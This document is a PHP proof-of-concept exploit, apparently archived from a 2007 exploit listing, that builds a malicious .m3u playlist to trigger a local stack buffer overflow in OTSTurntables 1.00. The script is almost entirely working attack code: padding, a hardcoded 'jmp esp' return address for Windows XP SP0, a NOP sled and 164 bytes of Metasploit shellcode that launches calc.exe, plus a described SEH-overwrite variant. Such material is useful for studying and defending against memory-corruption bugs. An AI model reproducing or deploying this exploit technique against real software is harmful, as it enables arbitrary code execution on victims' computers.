
# Title : OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit
# Published : 2007-09-02
# Author : 0x58


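<?php
declare(strict_types=1);
/*
OTSTurntables 1.00 (.m3u) local buffer overflow - proof of concept
by : 0x58
Greetz : Midt,,miyy3t,,Diablos5s5s5,,Str0ke,, MoroCcan haxorz,,!

Layout of the overflowing playlist entry written by this script:
  [A x 277] + [EIP = "jmp esp", 4 bytes] + [NOP x 10] + [shellcode]
The author reports 224 bytes of room for shellcode; the stock payload used
here is 164 bytes and can be swapped for another one that fits.

The EIP value 0x77394540 is a "jmp esp" in shell32.dll on Windows XP SP0.
That address is build-specific (pre-ASLR era) and has to be re-located for
any other OS, service pack or shell32.dll version.

Alternative SEH-based layout reported by the author (not generated here):
  [A x 277] + [EIP] + [B x 608] + [pointer to next SEH record] + [SE handler]

NOTE(review): the archived copy of this script had lost every backslash in
its "\x.." byte escapes and in the "\r\n" playlist line endings, so as
published it would have written the literal text "x33xc9..." instead of
bytes. The escapes are restored here; the restored shellcode is 164 bytes,
matching the "Size=164" in the Metasploit note below, and the EIP bytes are
the little-endian form of the address quoted above. Lab use only: the payload
is the Metasploit win32_exec stub that merely launches calc.exe.
*/
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84".
"\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d".
"\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91".
"\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5".
"\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe".
"\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc".
"\x80\x12\xcf\x18\xe0\x5a\xbe\xe8\x01\x11\x86\xd4\x0f\x91\xf2\x53".
"\xf4\xcd\x53\x53\xec\xd9\x15\xd1\x0f\x51\x4e\xd8\x84\xd1\x75\xb0".
"\xb8\x8e\xcf\x2e\xe4\x87\x77\x20\x07\x11\x85\x88\xec\x21\x74\xdc".
"\xdb\xb9\x66\x26\x0e\xdf\xa9\x27\x63\xb2\x9f\xb4\xe7\xff\x9b\xa0".
"\xe1\xd1\xfe\xd8";

// Sanity check: the decoder stub above expects exactly the 164 bytes the
// Metasploit note documents; a truncated or re-mangled copy must not be written.
if (strlen($shellcode) !== 164) {
    echo "Unexpected shellcode length ".strlen($shellcode)." (expected 164)<br>";
    exit(1);
}

// Padding up to the saved return address, then the jmp esp address
// (0x77394540, little-endian), a short NOP sled and the payload.
$eip = "\x40\x45\x39\x77";
$bof = str_repeat("A", 277).$eip.str_repeat("\x90", 10).$shellcode;

// Minimal extended-M3U playlist whose single entry path carries the overflow.
$filename = "OTSTurntables.m3u";
$playlist = "#EXTM3U\r\n"
          . "#EXTINF:0,TITLE\r\n"
          . "C:/"
          . $bof;

// Write the file, reporting failure instead of silently producing nothing.
if (file_put_contents($filename, $playlist) === false) {
    echo "Could not write ".$filename."<br>";
    exit(1);
}
echo "Exploit generated in : ".$filename."<br>";
?>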
